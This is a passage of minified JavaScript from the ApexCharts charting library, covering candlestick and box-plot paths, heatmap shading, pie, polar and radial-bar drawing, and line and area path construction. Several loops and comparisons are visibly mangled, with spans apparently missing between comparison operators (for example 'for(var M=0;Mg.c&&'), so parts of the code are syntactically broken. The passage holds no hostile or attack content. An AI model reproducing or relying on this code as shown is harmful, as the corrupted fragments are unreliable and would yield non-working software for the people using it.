0===g&&(g=l.globals.gridHeight),p=this.prevYF[0].every((function(e){return 0===e}))&&this.prevYF.slice(1,u).every((function(e){return e.every((function(e){return isNaN(e)}))}))?l.globals.gridHeight-o:g}else p=l.globals.gridHeight-o;i=p-this.series[u][c]/this.yRatio[this.yaxisIndex]+2*(this.isReversed?this.series[u][c]/this.yRatio[this.yaxisIndex]:0);var S=this.barHelpers.getColumnPaths({barXPosition:m,barWidth:r,y1:p,y2:i,yRatio:this.yRatio[this.yaxisIndex],strokeWidth:this.strokeWidth,series:this.series,realIndex:a.realIndex,i:u,j:c,w:l});return this.barHelpers.barBackground({bc:d,j:c,i:u,x1:m,x2:r,elSeries:s}),n+=t,{pathTo:S.pathTo,pathFrom:S.pathFrom,x:l.globals.isXNumeric?n-t:n,y:i}}}]),n}(),we=function(e){d(n,_);var a=f(n);function n(){return s(this,n),a.apply(this,arguments)}return u(n,[{key:"draw",value:function(e,a){var n=this,i=this.w,t=new S(this.ctx),o=new L(this.ctx);this.candlestickOptions=this.w.config.plotOptions.candlestick,this.boxOptions=this.w.config.plotOptions.boxPlot,this.isHorizontal=i.config.plotOptions.bar.horizontal;var s=new A(this.ctx,i);e=s.getLogSeries(e),this.series=e,this.yRatio=s.getLogYRatios(this.yRatio),this.barHelpers.initVariables(e);for(var l=t.group({class:"apexcharts-".concat(i.config.chart.type,"-series apexcharts-plot-series")}),u=function(s){n.isBoxPlot="boxPlot"===i.config.chart.type||"boxPlot"===i.config.series[s].type;var u,c,d,h,p,m,f=void 0,v=void 0,g=[],b=[],y=i.globals.comboCharts?a[s]:s,x=t.group({class:"apexcharts-series",seriesName:k.escapeString(i.globals.seriesNames[y]),rel:s+1,"data:realIndex":y});n.ctx.series.addCollapsedClassToSeries(x,y),e[s].length>0&&(n.visibleI=n.visibleI+1),n.yRatio.length>1&&(n.yaxisIndex=y);var S=n.barHelpers.initialPositions();v=S.y,p=S.barHeight,c=S.yDivision,h=S.zeroW,f=S.x,m=S.barWidth,u=S.xDivision,d=S.zeroH,b.push(f+m/2);for(var A=t.group({class:"apexcharts-datalabels","data:realIndex":y}),w=function(a){var t=n.barHelpers.getStrokeWidth(s,a,y),l=null,k={indexes:{i:s,j:a,realIndex:y},x:f,y:v,strokeWidth:t,elSeries:x};l=n.isHorizontal?n.drawHorizontalBoxPaths(r(r({},k),{},{yDivision:c,barHeight:p,zeroW:h})):n.drawVerticalBoxPaths(r(r({},k),{},{xDivision:u,barWidth:m,zeroH:d})),v=l.y,f=l.x,a>0&&b.push(f+m/2),g.push(v),l.pathTo.forEach((function(r,u){var c=!n.isBoxPlot&&n.candlestickOptions.wick.useFillColor?l.color[u]:i.globals.stroke.colors[s],d=o.fillPath({seriesNumber:y,dataPointIndex:a,color:l.color[u],value:e[s][a]});n.renderSeries({realIndex:y,pathFill:d,lineFill:c,j:a,i:s,pathFrom:l.pathFrom,pathTo:r,strokeWidth:t,elSeries:x,x:f,y:v,series:e,barHeight:p,barWidth:m,elDataLabelsWrap:A,visibleSeries:n.visibleI,type:i.config.chart.type})}))},M=0;Mg.c&&(d=!1);var y=Math.min(g.o,g.c),x=Math.max(g.o,g.c),A=g.m;s.globals.isXNumeric&&(n=(s.globals.seriesX[v][c]-s.globals.minX)/this.xRatio-t/2);var w=n+t*this.visibleI;void 0===this.series[u][c]||null===this.series[u][c]?(y=r,x=r):(y=r-y/f,x=r-x/f,b=r-g.h/f,k=r-g.l/f,A=r-g.m/f);var M=l.move(w,r),j=l.move(w+t/2,y);return s.globals.previousPaths.length>0&&(j=this.getPreviousPath(v,c,!0)),M=this.isBoxPlot?[l.move(w,y)+l.line(w+t/2,y)+l.line(w+t/2,b)+l.line(w+t/4,b)+l.line(w+t-t/4,b)+l.line(w+t/2,b)+l.line(w+t/2,y)+l.line(w+t,y)+l.line(w+t,A)+l.line(w,A)+l.line(w,y+o/2),l.move(w,A)+l.line(w+t,A)+l.line(w+t,x)+l.line(w+t/2,x)+l.line(w+t/2,k)+l.line(w+t-t/4,k)+l.line(w+t/4,k)+l.line(w+t/2,k)+l.line(w+t/2,x)+l.line(w,x)+l.line(w,A)+"z"]:[l.move(w,x)+l.line(w+t/2,x)+l.line(w+t/2,b)+l.line(w+t/2,x)+l.line(w+t,x)+l.line(w+t,y)+l.line(w+t/2,y)+l.line(w+t/2,k)+l.line(w+t/2,y)+l.line(w,y)+l.line(w,x-o/2)],j+=l.move(w,y),s.globals.isXNumeric||(n+=i),{pathTo:M,pathFrom:j,x:n,y:x,barXPosition:w,color:this.isBoxPlot?m:d?[h]:[p]}}},{key:"drawHorizontalBoxPaths",value:function(e){var a=e.indexes;e.x;var n=e.y,i=e.yDivision,t=e.barHeight,r=e.zeroW,o=e.strokeWidth,s=this.w,l=new S(this.ctx),u=a.i,c=a.j,d=this.boxOptions.colors.lower;this.isBoxPlot&&(d=[this.boxOptions.colors.lower,this.boxOptions.colors.upper]);var h=this.invertedYRatio,p=a.realIndex,m=this.getOHLCValue(p,c),f=r,v=r,g=Math.min(m.o,m.c),b=Math.max(m.o,m.c),k=m.m;s.globals.isXNumeric&&(n=(s.globals.seriesX[p][c]-s.globals.minX)/this.invertedXRatio-t/2);var y=n+t*this.visibleI;void 0===this.series[u][c]||null===this.series[u][c]?(g=r,b=r):(g=r+g/h,b=r+b/h,f=r+m.h/h,v=r+m.l/h,k=r+m.m/h);var x=l.move(r,y),A=l.move(g,y+t/2);return s.globals.previousPaths.length>0&&(A=this.getPreviousPath(p,c,!0)),x=[l.move(g,y)+l.line(g,y+t/2)+l.line(f,y+t/2)+l.line(f,y+t/2-t/4)+l.line(f,y+t/2+t/4)+l.line(f,y+t/2)+l.line(g,y+t/2)+l.line(g,y+t)+l.line(k,y+t)+l.line(k,y)+l.line(g+o/2,y),l.move(k,y)+l.line(k,y+t)+l.line(b,y+t)+l.line(b,y+t/2)+l.line(v,y+t/2)+l.line(v,y+t-t/4)+l.line(v,y+t/4)+l.line(v,y+t/2)+l.line(b,y+t/2)+l.line(b,y)+l.line(k,y)+"z"],A+=l.move(g,y),s.globals.isXNumeric||(n+=i),{pathTo:x,pathFrom:A,x:b,y:n,barYPosition:y,color:d}}},{key:"getOHLCValue",value:function(e,a){var n=this.w;return{o:this.isBoxPlot?n.globals.seriesCandleH[e][a]:n.globals.seriesCandleO[e][a],h:this.isBoxPlot?n.globals.seriesCandleO[e][a]:n.globals.seriesCandleH[e][a],m:n.globals.seriesCandleM[e][a],l:this.isBoxPlot?n.globals.seriesCandleC[e][a]:n.globals.seriesCandleL[e][a],c:this.isBoxPlot?n.globals.seriesCandleL[e][a]:n.globals.seriesCandleC[e][a]}}}]),n}(),Me=function(){function e(a){s(this,e),this.ctx=a,this.w=a.w}return u(e,[{key:"checkColorRange",value:function(){var e=this.w,a=!1,n=e.config.plotOptions[e.config.chart.type];return n.colorScale.ranges.length>0&&n.colorScale.ranges.map((function(e,n){e.from<=0&&(a=!0)})),a}},{key:"getShadeColor",value:function(e,a,n,i){var t=this.w,r=1,o=t.config.plotOptions[e].shadeIntensity,s=this.determineColor(e,a,n);t.globals.hasNegs||i?r=t.config.plotOptions[e].reverseNegativeShade?s.percent<0?s.percent/100*(1.25*o):(1-s.percent/100)*(1.25*o):s.percent<=0?1-(1+s.percent/100)*o:(1-s.percent/100)*o:(r=1-s.percent/100,"treemap"===e&&(r=(1-s.percent/100)*(1.25*o)));var l=s.color,u=new k;return t.config.plotOptions[e].enableShades&&(l="dark"===this.w.config.theme.mode?k.hexToRgba(u.shadeColor(-1*r,s.color),t.config.fill.opacity):k.hexToRgba(u.shadeColor(r,s.color),t.config.fill.opacity)),{color:l,colorProps:s}}},{key:"determineColor",value:function(e,a,n){var i=this.w,t=i.globals.series[a][n],r=i.config.plotOptions[e],o=r.colorScale.inverse?n:a;r.distributed&&"treemap"===i.config.chart.type&&(o=n);var s=i.globals.colors[o],l=null,u=Math.min.apply(Math,v(i.globals.series[a])),c=Math.max.apply(Math,v(i.globals.series[a]));r.distributed||"heatmap"!==e||(u=i.globals.minY,c=i.globals.maxY),void 0!==r.colorScale.min&&(u=r.colorScale.mini.globals.maxY?r.colorScale.max:i.globals.maxY);var d=Math.abs(c)+Math.abs(u),h=100*t/(0===d?d-1e-6:d);return r.colorScale.ranges.length>0&&r.colorScale.ranges.map((function(e,a){if(t>=e.from&&t<=e.to){s=e.color,l=e.foreColor?e.foreColor:null,u=e.from,c=e.to;var n=Math.abs(c)+Math.abs(u);h=100*t/(0===n?n-1e-6:n)}})),{color:s,foreColor:l,percent:h}}},{key:"calculateDataLabels",value:function(e){var a=e.text,n=e.x,i=e.y,t=e.i,r=e.j,o=e.colorProps,s=e.fontSize,l=this.w.config.dataLabels,u=new S(this.ctx),c=new E(this.ctx),d=null;if(l.enabled){d=u.group({class:"apexcharts-data-labels"});var h=l.offsetX,p=l.offsetY,m=n+h,f=i+parseFloat(l.style.fontSize)/3+p;c.plotDataLabelsText({x:m,y:f,text:a,i:t,j:r,color:o.foreColor,parent:d,fontSize:s,dataLabelsConfig:l})}return d}},{key:"addListeners",value:function(e){var a=new S(this.ctx);e.node.addEventListener("mouseenter",a.pathMouseEnter.bind(this,e)),e.node.addEventListener("mouseleave",a.pathMouseLeave.bind(this,e)),e.node.addEventListener("mousedown",a.pathMouseDown.bind(this,e))}}]),e}(),je=function(){function e(a,n){s(this,e),this.ctx=a,this.w=a.w,this.xRatio=n.xRatio,this.yRatio=n.yRatio,this.dynamicAnim=this.w.config.chart.animations.dynamicAnimation,this.helpers=new Me(a),this.rectRadius=this.w.config.plotOptions.heatmap.radius,this.strokeWidth=this.w.config.stroke.show?this.w.config.stroke.width:0}return u(e,[{key:"draw",value:function(e){var a=this.w,n=new S(this.ctx),i=n.group({class:"apexcharts-heatmap"});i.attr("clip-path","url(#gridRectMask".concat(a.globals.cuid,")"));var t=a.globals.gridWidth/a.globals.dataPoints,r=a.globals.gridHeight/a.globals.series.length,o=0,s=!1;this.negRange=this.helpers.checkColorRange();var l=e.slice();a.config.yaxis[0].reversed&&(s=!0,l.reverse());for(var u=s?0:l.length-1;s?u=0;s?u++:u--){var c=n.group({class:"apexcharts-series apexcharts-heatmap-series",seriesName:k.escapeString(a.globals.seriesNames[u]),rel:u+1,"data:realIndex":u});if(this.ctx.series.addCollapsedClassToSeries(c,u),a.config.chart.dropShadow.enabled){var d=a.config.chart.dropShadow;new x(this.ctx).dropShadow(c,d,u)}for(var h=0,p=a.config.plotOptions.heatmap.shadeIntensity,m=0;m-1&&this.pieClicked(d),n.config.dataLabels.enabled){var A=b.x,w=b.y,M=100*p/this.fullAngle+"%";if(0!==p&&n.config.plotOptions.pie.dataLabels.minAngleToShowLabelthis.fullAngle?a.endAngle=a.endAngle-(i+o):i+o=this.fullAngle+this.w.config.plotOptions.pie.startAngle%this.fullAngle&&(s=this.fullAngle+this.w.config.plotOptions.pie.startAngle%this.fullAngle-.01),Math.ceil(s)>this.fullAngle&&(s-=this.fullAngle);var l=Math.PI*(s-90)/180,u=a.centerX+t*Math.cos(o),c=a.centerY+t*Math.sin(o),d=a.centerX+t*Math.cos(l),h=a.centerY+t*Math.sin(l),p=k.polarToCartesian(a.centerX,a.centerY,a.donutSize,s),m=k.polarToCartesian(a.centerX,a.centerY,a.donutSize,r),f=i>180?1:0,v=["M",u,c,"A",t,t,0,f,1,d,h];return"donut"===a.chartType?[].concat(v,["L",p.x,p.y,"A",a.donutSize,a.donutSize,0,f,0,m.x,m.y,"L",u,c,"z"]).join(" "):"pie"===a.chartType||"polarArea"===a.chartType?[].concat(v,["L",a.centerX,a.centerY,"L",u,c]).join(" "):[].concat(v).join(" ")}},{key:"drawPolarElements",value:function(e){var a=this.w,n=new X(this.ctx),i=new S(this.ctx),t=new Ce(this.ctx),r=i.group(),o=i.group(),s=n.niceScale(0,Math.ceil(this.maxY),a.config.yaxis[0].tickAmount,0,!0),l=s.result.reverse(),u=s.result.length;this.maxY=s.niceMax;for(var c=a.globals.radialSize,d=c/(u-1),h=0;h1&&e.total.show&&(t=e.total.color);var o=r.globals.dom.baseEl.querySelector(".apexcharts-datalabel-label"),s=r.globals.dom.baseEl.querySelector(".apexcharts-datalabel-value");n=(0,e.value.formatter)(n,r),i||"function"!=typeof e.total.formatter||(n=e.total.formatter(r));var l=a===e.total.label;a=e.name.formatter(a,l,r),null!==o&&(o.textContent=a),null!==s&&(s.textContent=n),null!==o&&(o.style.fill=t)}},{key:"printDataLabelsInner",value:function(e,a){var n=this.w,i=e.getAttribute("data:value"),t=n.globals.seriesNames[parseInt(e.parentNode.getAttribute("rel"),10)-1];n.globals.series.length>1&&this.printInnerLabels(a,t,i,e);var r=n.globals.dom.baseEl.querySelector(".apexcharts-datalabels-group");null!==r&&(r.style.opacity=1)}},{key:"drawSpokes",value:function(e){var a=this,n=this.w,i=new S(this.ctx),t=n.config.plotOptions.polarArea.spokes;if(0!==t.strokeWidth){for(var r=[],o=360/n.globals.series.length,s=0;s1)o&&!a.total.showAlways?l({makeSliceOut:!1,printLabel:!0}):this.printInnerLabels(a,a.total.label,a.total.formatter(t));else if(l({makeSliceOut:!1,printLabel:!0}),!o)if(t.globals.selectedDataPoints.length&&t.globals.series.length>1)if(t.globals.selectedDataPoints[0].length>0){var u=t.globals.selectedDataPoints[0],c=t.globals.dom.baseEl.querySelector(".apexcharts-".concat(this.chartType.toLowerCase(),"-slice-").concat(u));this.printDataLabelsInner(c,a)}else r&&t.globals.selectedDataPoints.length&&0===t.globals.selectedDataPoints[0].length&&(r.style.opacity=0);else r&&t.globals.series.length>1&&(r.style.opacity=0)}}]),e}(),Be=function(){function e(a){s(this,e),this.ctx=a,this.w=a.w,this.chartType=this.w.config.chart.type,this.initialAnim=this.w.config.chart.animations.enabled,this.dynamicAnim=this.initialAnim&&this.w.config.chart.animations.dynamicAnimation.enabled,this.animDur=0;var n=this.w;this.graphics=new S(this.ctx),this.lineColorArr=void 0!==n.globals.stroke.colors?n.globals.stroke.colors:n.globals.colors,this.defaultSize=n.globals.svgHeight0&&(f=a.getPreviousPath(s));for(var v=0;v=10?e.x>0?(n="start",i+=10):e.x<0&&(n="end",i-=10):n="middle",Math.abs(e.y)>=a-10&&(e.y<0?t-=10:e.y>0&&(t+=10)),{textAnchor:n,newX:i,newY:t}}},{key:"getPreviousPath",value:function(e){for(var a=this.w,n=null,i=0;i0&&parseInt(t.realIndex,10)===parseInt(e,10)&&void 0!==a.globals.previousPaths[i].paths[0]&&(n=a.globals.previousPaths[i].paths[0].d)}return n}},{key:"getDataPointsPos",value:function(e,a){var n=arguments.length>2&&void 0!==arguments[2]?arguments[2]:this.dataPointsLen;e=e||[],a=a||[];for(var i=[],t=0;t=360&&(h=360-Math.abs(this.startAngle)-.1);var p=n.drawPath({d:"",stroke:c,strokeWidth:o*parseInt(u.strokeWidth,10)/100,fill:"none",strokeOpacity:u.opacity,classes:"apexcharts-radialbar-area"});if(u.dropShadow.enabled){var m=u.dropShadow;t.dropShadow(p,m)}l.add(p),p.attr("id","apexcharts-radialbarTrack-"+s),this.animatePaths(p,{centerX:e.centerX,centerY:e.centerY,endAngle:h,startAngle:d,size:e.size,i:s,totalItems:2,animBeginArr:0,dur:0,isTrack:!0,easing:a.globals.easing})}return i}},{key:"drawArcs",value:function(e){var a=this.w,n=new S(this.ctx),i=new L(this.ctx),t=new x(this.ctx),r=n.group(),o=this.getStrokeWidth(e);e.size=e.size-o/2;var s=a.config.plotOptions.radialBar.hollow.background,l=e.size-o*e.series.length-this.margin*e.series.length-o*parseInt(a.config.plotOptions.radialBar.track.strokeWidth,10)/100/2,u=l-a.config.plotOptions.radialBar.hollow.margin;void 0!==a.config.plotOptions.radialBar.hollow.image&&(s=this.drawHollowImage(e,r,l,s));var c=this.drawHollow({size:u,centerX:e.centerX,centerY:e.centerY,fill:s||"transparent"});if(a.config.plotOptions.radialBar.hollow.dropShadow.enabled){var d=a.config.plotOptions.radialBar.hollow.dropShadow;t.dropShadow(c,d)}var h=1;!this.radialDataLabels.total.show&&a.globals.series.length>1&&(h=0);var p=null;this.radialDataLabels.show&&(p=this.renderInnerDataLabels(this.radialDataLabels,{hollowSize:l,centerX:e.centerX,centerY:e.centerY,opacity:h})),"back"===a.config.plotOptions.radialBar.hollow.position&&(r.add(c),p&&r.add(p));var m=!1;a.config.plotOptions.radialBar.inverseOrder&&(m=!0);for(var f=m?e.series.length-1:0;m?f>=0:f100?100:e.series[f])/100,w=Math.round(this.totalAngle*A)+this.startAngle,M=void 0;a.globals.dataChanged&&(y=this.startAngle,M=Math.round(this.totalAngle*k.negToZero(a.globals.previousPaths[f])/100)+y),Math.abs(w)+Math.abs(b)>=360&&(w-=.01),Math.abs(M)+Math.abs(y)>=360&&(M-=.01);var j=w-b,C=Array.isArray(a.config.stroke.dashArray)?a.config.stroke.dashArray[f]:a.config.stroke.dashArray,P=n.drawPath({d:"",stroke:g,strokeWidth:o,fill:"none",fillOpacity:a.config.fill.opacity,classes:"apexcharts-radialbar-area apexcharts-radialbar-slice-"+f,strokeDashArray:C});if(S.setAttrs(P.node,{"data:angle":j,"data:value":e.series[f]}),a.config.chart.dropShadow.enabled){var B=a.config.chart.dropShadow;t.dropShadow(P,B,f)}t.setSelectionFilter(P,0,f),this.addListeners(P,this.radialDataLabels),v.add(P),P.attr({index:0,j:f});var T=0;!this.initialAnim||a.globals.resized||a.globals.dataChanged||(T=a.config.chart.animations.speed),a.globals.dataChanged&&(T=a.config.chart.animations.dynamicAnimation.speed),this.animDur=T/(1.2*e.series.length)+this.animDur,this.animBeginArr.push(this.animDur),this.animatePaths(P,{centerX:e.centerX,centerY:e.centerY,endAngle:w,startAngle:b,prevEndAngle:M,prevStartAngle:y,size:e.size,i:f,totalItems:2,animBeginArr:this.animBeginArr,dur:T,shouldSetPrevPaths:!0,easing:a.globals.easing})}return{g:r,elHollow:c,dataLabels:p}}},{key:"drawHollow",value:function(e){var a=new S(this.ctx).drawCircle(2*e.size);return a.attr({class:"apexcharts-radialbar-hollow",cx:e.centerX,cy:e.centerY,r:e.size,fill:e.fill}),a}},{key:"drawHollowImage",value:function(e,a,n,i){var t=this.w,r=new L(this.ctx),o=k.randomId(),s=t.config.plotOptions.radialBar.hollow.image;if(t.config.plotOptions.radialBar.hollow.imageClipped)r.clippedImgArea({width:n,height:n,image:s,patternID:"pattern".concat(t.globals.cuid).concat(o)}),i="url(#pattern".concat(t.globals.cuid).concat(o,")");else{var l=t.config.plotOptions.radialBar.hollow.imageWidth,u=t.config.plotOptions.radialBar.hollow.imageHeight;if(void 0===l&&void 0===u){var c=t.globals.dom.Paper.image(s).loaded((function(a){this.move(e.centerX-a.width/2+t.config.plotOptions.radialBar.hollow.imageOffsetX,e.centerY-a.height/2+t.config.plotOptions.radialBar.hollow.imageOffsetY)}));a.add(c)}else{var d=t.globals.dom.Paper.image(s).loaded((function(a){this.move(e.centerX-l/2+t.config.plotOptions.radialBar.hollow.imageOffsetX,e.centerY-u/2+t.config.plotOptions.radialBar.hollow.imageOffsetY),this.size(l,u)}));a.add(d)}}return i}},{key:"getStrokeWidth",value:function(e){var a=this.w;return e.size*(100-parseInt(a.config.plotOptions.radialBar.hollow.size,10))/100/(e.series.length+1)-this.margin}}]),n}(),Le=function(){function e(a){s(this,e),this.w=a.w,this.lineCtx=a}return u(e,[{key:"sameValueSeriesFix",value:function(e,a){var n=this.w;if("line"===n.config.chart.type&&("gradient"===n.config.fill.type||"gradient"===n.config.fill.type[e])&&new A(this.lineCtx.ctx,n).seriesHaveSameValues(e)){var i=a[e].slice();i[i.length-1]=i[i.length-1]+1e-6,a[e]=i}return a}},{key:"calculatePoints",value:function(e){var a=e.series,n=e.realIndex,i=e.x,t=e.y,r=e.i,o=e.j,s=e.prevY,l=this.w,u=[],c=[];if(0===o){var d=this.lineCtx.categoryAxisCorrection+l.config.markers.offsetX;l.globals.isXNumeric&&(d=(l.globals.seriesX[n][0]-l.globals.minX)/this.lineCtx.xRatio+l.config.markers.offsetX),u.push(d),c.push(k.isNumber(a[r][0])?s+l.config.markers.offsetY:null),u.push(i+l.config.markers.offsetX),c.push(k.isNumber(a[r][o+1])?t+l.config.markers.offsetY:null)}else u.push(i+l.config.markers.offsetX),c.push(k.isNumber(a[r][o+1])?t+l.config.markers.offsetY:null);return{x:u,y:c}}},{key:"checkPreviousPaths",value:function(e){for(var a=e.pathFromLine,n=e.pathFromArea,i=e.realIndex,t=this.w,r=0;r0&&parseInt(o.realIndex,10)===parseInt(i,10)&&("line"===o.type?(this.lineCtx.appendPathFrom=!1,a=t.globals.previousPaths[r].paths[0].d):"area"===o.type&&(this.lineCtx.appendPathFrom=!1,n=t.globals.previousPaths[r].paths[0].d,t.config.stroke.show&&t.globals.previousPaths[r].paths[1]&&(a=t.globals.previousPaths[r].paths[1].d)))}return{pathFromLine:a,pathFromArea:n}}},{key:"determineFirstPrevY",value:function(e){var a=e.i,n=e.series,i=e.prevY,t=e.lineYPosition,r=this.w;if(void 0!==n[a][0])i=(t=r.config.chart.stacked&&a>0?this.lineCtx.prevSeriesY[a-1][0]:this.lineCtx.zeroY)-n[a][0]/this.lineCtx.yRatio[this.lineCtx.yaxisIndex]+2*(this.lineCtx.isReversed?n[a][0]/this.lineCtx.yRatio[this.lineCtx.yaxisIndex]:0);else if(r.config.chart.stacked&&a>0&&void 0===n[a][0])for(var o=a-1;o>=0;o--)if(null!==n[o][0]&&void 0!==n[o][0]){i=t=this.lineCtx.prevSeriesY[o][0];break}return{prevY:i,lineYPosition:t}}}]),e}(),ze=function(){function e(a,n,i){s(this,e),this.ctx=a,this.w=a.w,this.xyRatios=n,this.pointsChart=!("bubble"!==this.w.config.chart.type&&"scatter"!==this.w.config.chart.type)||i,this.scatter=new N(this.ctx),this.noNegatives=this.w.globals.minX===Number.MAX_VALUE,this.lineHelpers=new Le(this),this.markers=new z(this.ctx),this.prevSeriesY=[],this.categoryAxisCorrection=0,this.yaxisIndex=0}return u(e,[{key:"draw",value:function(e,a,n){var i=this.w,t=new S(this.ctx),r=i.globals.comboCharts?a:i.config.chart.type,o=t.group({class:"apexcharts-".concat(r,"-series apexcharts-plot-series")}),s=new A(this.ctx,i);this.yRatio=this.xyRatios.yRatio,this.zRatio=this.xyRatios.zRatio,this.xRatio=this.xyRatios.xRatio,this.baseLineY=this.xyRatios.baseLineY,e=s.getLogSeries(e),this.yRatio=s.getLogYRatios(this.yRatio);for(var l=[],u=0;u0&&(p=(i.globals.seriesX[c][0]-i.globals.minX)/this.xRatio),h.push(p);var m,f=p,v=f,g=this.zeroY;g=this.lineHelpers.determineFirstPrevY({i:u,series:e,prevY:g,lineYPosition:0}).prevY,d.push(g),m=g;var b=this._calculatePathsFrom({series:e,i:u,realIndex:c,prevX:v,prevY:g}),k=this._iterateOverDataPoints({series:e,realIndex:c,i:u,x:p,y:1,pX:f,pY:m,pathsFrom:b,linePaths:[],areaPaths:[],seriesIndex:n,lineYPosition:0,xArrj:h,yArrj:d});this._handlePaths({type:r,realIndex:c,i:u,paths:k}),this.elSeries.add(this.elPointsMain),this.elSeries.add(this.elDataLabelsWrap),l.push(this.elSeries)}if(i.config.chart.stacked)for(var y=l.length;y>0;y--)o.add(l[y-1]);else for(var x=0;x1&&(this.yaxisIndex=n),this.isReversed=i.config.yaxis[this.yaxisIndex]&&i.config.yaxis[this.yaxisIndex].reversed,this.zeroY=i.globals.gridHeight-this.baseLineY[this.yaxisIndex]-(this.isReversed?i.globals.gridHeight:0)+(this.isReversed?2*this.baseLineY[this.yaxisIndex]:0),this.areaBottomY=this.zeroY,(this.zeroY>i.globals.gridHeight||"end"===i.config.plotOptions.area.fillTo)&&(this.areaBottomY=i.globals.gridHeight),this.categoryAxisCorrection=this.xDivision/2,this.elSeries=t.group({class:"apexcharts-series",seriesName:k.escapeString(i.globals.seriesNames[n])}),this.elPointsMain=t.group({class:"apexcharts-series-markers-wrap","data:realIndex":n}),this.elDataLabelsWrap=t.group({class:"apexcharts-datalabels","data:realIndex":n});var r=e[a].length===i.globals.dataPoints;this.elSeries.attr({"data:longestSeries":r,rel:a+1,"data:realIndex":n}),this.appendPathFrom=!0}},{key:"_calculatePathsFrom",value:function(e){var a,n,i,t,r=e.series,o=e.i,s=e.realIndex,l=e.prevX,u=e.prevY,c=this.w,d=new S(this.ctx);if(null===r[o][0]){for(var h=0;h0){var p=this.lineHelpers.checkPreviousPaths({pathFromLine:i,pathFromArea:t,realIndex:s});i=p.pathFromLine,t=p.pathFromArea}return{prevX:l,prevY:u,linePath:a,areaPath:n,pathFromLine:i,pathFromArea:t}}},{key:"_handlePaths",value:function(e){var a=e.type,n=e.realIndex,i=e.i,t=e.paths,o=this.w,s=new S(this.ctx),l=new L(this.ctx);this.prevSeriesY.push(t.yArrj),o.globals.seriesXvalues[n]=t.xArrj,o.globals.seriesYvalues[n]=t.yArrj;var u=o.config.forecastDataPoints;if(u.count>0){var c=o.globals.seriesXvalues[n][o.globals.seriesXvalues[n].length-u.count-1],d=s.drawRect(c,0,o.globals.gridWidth,o.globals.gridHeight,0);o.globals.dom.elForecastMask.appendChild(d.node);var h=s.drawRect(0,0,c,o.globals.gridHeight,0);o.globals.dom.elNonForecastMask.appendChild(h.node)}this.pointsChart||o.globals.delayedElements.push({el:this.elPointsMain.node,index:n});var p={i:i,realIndex:n,animationDelay:i,initialSpeed:o.config.chart.animations.speed,dataChangeSpeed:o.config.chart.animations.dynamicAnimation.speed,className:"apexcharts-".concat(a)};if("area"===a)for(var m=l.fillPath({seriesNumber:n}),f=0;f0){var x=s.renderPaths(k);x.node.setAttribute("stroke-dasharray",u.dashArray),u.strokeWidth&&x.node.setAttribute("stroke-width",u.strokeWidth),this.elSeries.add(x),x.attr("clip-path","url(#forecastMask".concat(o.globals.cuid,")")),y.attr("clip-path","url(#nonForecastMask".concat(o.globals.cuid,")"))}}}}},{key:"_iterateOverDataPoints",value:function(e){for(var a=e.series,n=e.realIndex,i=e.i,t=e.x,r=e.y,o=e.pX,s=e.pY,l=e.pathsFrom,u=e.linePaths,c=e.areaPaths,d=e.seriesIndex,h=e.lineYPosition,p=e.xArrj,m=e.yArrj,f=this.w,v=new S(this.ctx),g=this.yRatio,b=l.prevY,y=l.linePath,x=l.areaPath,A=l.pathFromLine,w=l.pathFromArea,M=k.isNumber(f.globals.minYArr[n])?f.globals.minYArr[n]:f.globals.minY,j=f.globals.dataPoints>1?f.globals.dataPoints-1:f.globals.dataPoints,C=0;C0&&f.globals.collapsedSeries.length-1){a--;break}return a>=0?a:0}(i-1)][C+1]:this.zeroY,r=P?h-M/g[this.yaxisIndex]+2*(this.isReversed?M/g[this.yaxisIndex]:0):h-a[i][C+1]/g[this.yaxisIndex]+2*(this.isReversed?a[i][C+1]/g[this.yaxisIndex]:0),p.push(t),m.push(r);var T=this.lineHelpers.calculatePoints({series:a,x:t,y:r,realIndex:n,i:i,j:C,prevY:b}),L=this._createPaths({series:a,i:i,realIndex:n,j:C,x:t,y:r,pX:o,pY:s,linePath:y,areaPath:x,linePaths:u,areaPaths:c,seriesIndex:d});c=L.areaPaths,u=L.linePaths,o=L.pX,s=L.pY,x=L.areaPath,y=L.linePath,this.appendPathFrom&&(A+=v.line(t,this.zeroY),w+=v.line(t,this.zeroY)),this.handleNullDataPoints(a,T,i,C,n),this._handleMarkersAndLabels({pointsPos:T,series:a,x:t,y:r,prevY:b,i:i,j:C,realIndex:n})}return{yArrj:m,xArrj:p,pathFromArea:w,areaPaths:c,pathFromLine:A,linePaths:u}}},{key:"_handleMarkersAndLabels",value:function(e){var a=e.pointsPos;e.series,e.x,e.y,e.prevY;var n=e.i,i=e.j,t=e.realIndex,r=this.w,o=new E(this.ctx);if(this.pointsChart)this.scatter.draw(this.elSeries,i,{realIndex:t,pointsPos:a,zRatio:this.zRatio,elParent:this.elPointsMain});else{r.globals.series[n].length>1&&this.elPointsMain.node.classList.add("apexcharts-element-hidden");var s=this.markers.plotChartMarkers(a,t,i+1);null!==s&&this.elPointsMain.add(s)}var l=o.drawDataLabel(a,t,i+1,null);null!==l&&this.elDataLabelsWrap.add(l)}},{key:"_createPaths",value:function(e){var a=e.series,n=e.i,i=e.realIndex,t=e.j,r=e.x,o=e.y,s=e.pX,l=e.pY,u=e.linePath,c=e.areaPath,d=e.linePaths,h=e.areaPaths,p=e.seriesIndex,m=this.w,f=new S(this.ctx),v=m.config.stroke.curve,g=this.areaBottomY;if(Array.isArray(m.config.stroke.curve)&&(v=Array.isArray(p)?m.config.stroke.curve[p[n]]:m.config.stroke.curve[n]),"smooth"===v){var b=.35*(r-s);m.globals.hasNullValues?(null!==a[n][t]&&(null!==a[n][t+1]?(u=f.move(s,l)+f.curve(s+b,l,r-b,o,r+1,o),c=f.move(s+1,l)+f.curve(s+b,l,r-b,o,r+1,o)+f.line(r,g)+f.line(s,g)+"z"):(u=f.move(s,l),c=f.move(s,l)+"z")),d.push(u),h.push(c)):(u+=f.curve(s+b,l,r-b,o,r,o),c+=f.curve(s+b,l,r-b,o,r,o)),s=r,l=o,t===a[n].length-2&&(c=c+f.curve(s,l,r,o,r,g)+f.move(r,o)+"z",m.globals.hasNullValues||(d.push(u),h.push(c)))}else{if(null===a[n][t+1]){u+=f.move(r,o);var 